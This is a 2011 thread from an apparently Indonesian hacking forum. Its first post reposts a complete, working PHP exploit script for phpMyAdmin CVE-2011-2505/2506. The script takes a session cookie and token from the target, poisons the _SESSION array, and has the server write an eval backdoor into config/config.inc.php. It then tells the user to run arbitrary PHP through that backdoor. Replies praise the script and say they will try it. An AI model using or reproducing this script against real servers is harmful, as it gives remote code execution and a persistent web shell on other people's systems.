.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 phpMyAdmin 3.x Swekey Remote Code Injection Exploit

Go down 
3 posters
PengirimMessage
Copper
Lamer
Lamer
Copper


Jumlah posting : 232
Points : 338
Reputation : 0
Join date : 21.07.11
Age : 33
Lokasi : dimana-mana

phpMyAdmin 3.x Swekey Remote Code Injection Exploit Empty
PostSubyek: phpMyAdmin 3.x Swekey Remote Code Injection Exploit   phpMyAdmin 3.x Swekey Remote Code Injection Exploit Icon_minitimeSat Jul 23, 2011 3:37 pm

Quote :
<?php /*
# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
# Date: 2011-07-09
# Author: Mango of ha.xxor.se
# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
# CVE : CVE-2011-2505, CVE-2011-2506
# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
*/
echo php_sapi_name()!=='cli'?'<pre>':'';?>
.
, )\ .
. ,/) , / ) , )\
)\( /)/( (__( /( / ) __ __ ________ __ __
/ \ ( )| |) \ / | |\ /| | | | | | | | (__)
( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____
\| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | |
| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|
==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []
Remote Code Injection [] [][] [] [] [] [] [] []
http://ha.xxor.se [][] [] [] [] [][] [][] [] []
_ _ ___ __ ____ __ ___ ___
| |-| || _ |\ /\ /| _ || )
|_|-|_||_|_|/_._\/_._\|___||_|_\
___ ___ ___ _ _ ___ ___ __ __
( < | [_ / /| || || )(_)| |\ | /
>__)|_[_ \__\|____||_|_\|_| |_| |_|

Use responsibly.

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

if(php_sapi_name()==='cli'){
if(!isset($argv[1])){
output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
killme();
}
$pmaurl = $argv[1];
}else{
$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token = null;
if(!function_exists('curl_init')){
output('[!] Fatal error. Need cURL!');
killme();
}
$ch = curl_init();
$debug = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=?>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}

output("[i] Running...");

// Start a session and get a token
curl_setopt_array($ch, array(
CURLOPT_URL => $pmaurl.'/setup/index.php',
CURLOPT_HEADER => 1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 4,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");

$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
killme();
}
if(!$result){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
killme();
}

// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);

// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}


curl_close($ch);

function output($msg){
echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
flush();
}

function killme(){
output("[*] Exiting...");
echo php_sapi_name()!=='cli'?'<pre>':'';
die();
}

echo php_sapi_name()!=='cli'?'<pre>':'';?>
Kembali Ke Atas Go down
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

phpMyAdmin 3.x Swekey Remote Code Injection Exploit Empty
PostSubyek: Re: phpMyAdmin 3.x Swekey Remote Code Injection Exploit   phpMyAdmin 3.x Swekey Remote Code Injection Exploit Icon_minitimeSat Jul 23, 2011 6:08 pm

phpMyAdmin 3.x Swekey Remote Code Injection Exploit 772168924 sep sep mantab boss,,,ijn belajar phpMyAdmin 3.x Swekey Remote Code Injection Exploit 3402572103
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Banditcode
Top Nubie
Top Nubie
Banditcode


Jumlah posting : 42
Points : 71
Reputation : 2
Join date : 12.08.11

phpMyAdmin 3.x Swekey Remote Code Injection Exploit Empty
PostSubyek: Re: phpMyAdmin 3.x Swekey Remote Code Injection Exploit   phpMyAdmin 3.x Swekey Remote Code Injection Exploit Icon_minitimeFri Aug 12, 2011 2:27 am

saya cobain dulu gan, tapi kok agak berantakan ya phpMyAdmin 3.x Swekey Remote Code Injection Exploit 2116444611
Kembali Ke Atas Go down
Sponsored content





phpMyAdmin 3.x Swekey Remote Code Injection Exploit Empty
PostSubyek: Re: phpMyAdmin 3.x Swekey Remote Code Injection Exploit   phpMyAdmin 3.x Swekey Remote Code Injection Exploit Icon_minitime

Kembali Ke Atas Go down
 
phpMyAdmin 3.x Swekey Remote Code Injection Exploit
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» JTL Shop 2 Remote SQL Injection Exploit
» PhpMyadmin XSRF Vuln (Execute SQL Query)
» Sun Java Web Sever 7.0 u7 Remote Exploit
» Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
» WordPress TimThumb Plugin - Remote Code Execution

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: